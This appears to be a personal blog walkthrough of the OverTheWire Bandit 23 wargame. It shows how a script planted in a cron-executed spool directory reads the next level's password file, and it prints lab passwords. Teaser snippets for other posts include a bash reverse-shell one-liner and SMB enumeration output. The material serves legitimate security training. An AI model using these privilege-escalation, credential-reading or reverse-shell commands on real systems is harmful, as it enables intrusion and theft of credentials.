Skip to main content

Bandit 23 Over The Wire

Lessons Learned

understanding more complicated bash scripts and writing bash scripts to take advantage of automated processes

Logging in

On a kali vm/ linux machine

Type:

ssh bandit23@bandit.labs.overthewire.org -p 2220
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n 

Completing The Challenge

The Goal:

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

The Solution:

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

What it does:

myname = bandit24(whoami in a job set to run by bandit24)

cd /var/spool/bandit24

echo "Executing and deleting all scripts in /var/spool/bandit24"

for all files that can be called by " ."

    if not file is "." current folder and if not file is ".." previous folder

        then echo "Handling 'File'"

        owner = use the stat cmd to get information from the file "$i" and only return the user name of the         owner

        if the owner of the file is "bandit23"

             timeout send signal the number 9 which in the notes it says is kill, though to see other possible signals you can check "kill -l" as mentioned in the man page of timeout.

            the results of "kill -l" is 

bandit23@bandit:~$ kill -l
 1) SIGHUP       2) SIGINT       3) SIGQUIT      4) SIGILL       5) SIGTRAP
 6) SIGABRT      7) SIGBUS       8) SIGFPE       9) SIGKILL     10) SIGUSR1
11) SIGSEGV     12) SIGUSR2     13) SIGPIPE     14) SIGALRM     15) SIGTERM
16) SIGSTKFLT   17) SIGCHLD     18) SIGCONT     19) SIGSTOP     20) SIGTSTP
21) SIGTTIN     22) SIGTTOU     23) SIGURG      24) SIGXCPU     25) SIGXFSZ
26) SIGVTALRM   27) SIGPROF     28) SIGWINCH    29) SIGIO       30) SIGPWR
31) SIGSYS      34) SIGRTMIN    35) SIGRTMIN+1  36) SIGRTMIN+2  37) SIGRTMIN+3
38) SIGRTMIN+4  39) SIGRTMIN+5  40) SIGRTMIN+6  41) SIGRTMIN+7  42) SIGRTMIN+8
43) SIGRTMIN+9  44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
48) SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
53) SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9  56) SIGRTMAX-8  57) SIGRTMAX-7
58) SIGRTMAX-6  59) SIGRTMAX-5  60) SIGRTMAX-4  61) SIGRTMAX-3  62) SIGRTMAX-2
63) SIGRTMAX-1  64) SIGRTMAX

            to conclude the timeout line: if the file run here is owned by bandit23 then it will be run, but set to timeout after a minute. This might enable other users to have persistance, but over the wire asks us tonot keep uneeded processes  running and they set up a pretty simple cleanup for all scripts done in this challenge.

            granted its  also possible they have certain group/file permission set up to only allow bandit23 and bandit24 to write to the folder, im uncertain of ways to test this withou sudo or changing to a different user neither of which i will do now.

    finally the script concludes by forcing a delete of the file it just used.

 Here we can easily replicate the code from the last challenge. 

So create a file in /var/spool/bandit24 and populate it with something like the following

touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi


As shown below

bandit23@bandit:~$ touch /var/spool/bandit24/yesboi; printf "#\!/bin/bash\nchmod 644\n/tmp/trhhvfhifuighvuyitg\ncat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitg" > /var/spool/bandit24/yesboi; chmod +x /var/spool/bandit24/yesboi

bandit23@bandit:~$ cat /var/spool/bandit24/yesboi

#\!/bin/bash

chmod 644

/tmp/trhhvfhifuighvuyitg

cat /etc/bandit_pass/bandit24 > /tmp/trhhvfhifuighvuyitgbandit23@bandit:~$ cat /var/spool/bandit24/yesboi

cat: /var/spool/bandit24/yesboi: No such file or directory

bandit23@bandit:~$ cat /tmp/trhhvfhifuighvuyitg UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

I use a one liner to create the file, write to it and make it executable. The file uses printf for reliable new lines. And a backslash is added to ! Since that is a special character that result in a looking for event error. Which seems to be a bash feature that for history substitution. 

Labels:

Comments

Post a Comment

Popular posts from this blog

Network Services

Network Services https://tryhackme.com/room/networkservices 3. Enumerating SMB Conduct an nmap scan of your choosing, How many ports are open? running nmap 10.10.197.190 results in PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 02:21:CD:94:98:F5 (Unknown) Show/Hide What ports is SMB running on? 139/445 Show/Hide this is the known default values for SMB Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP Show/Hide looking at the rest of the info from enum4linux -a 10.10.197.190 ill summarize here ========================== | Target Information | ========================== Target ........... 10.10.197.190 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================...
Post a Comment
Read more

Bandit 12 Over The Wire

Lessons Learned extracting and decompressing files using the following tools: file, xxd -r, gunzip, bunsip2, and tar -xf Logging in On a kali vm/ linux machine Type: ssh bandit12@bandit.labs.overthewire.org -p 2220  5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!) The Solution:      Revamped:         I decided to write a bash file that solves the problem.                    mkdir /tmp/a_name/                    mv data.txt /tmp/a_name      ...
Post a Comment
Read more

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh bandit18@bandit.labs.overthewire.org -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on http://www.overthewire.org/wargames bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1  
Post a Comment
Read more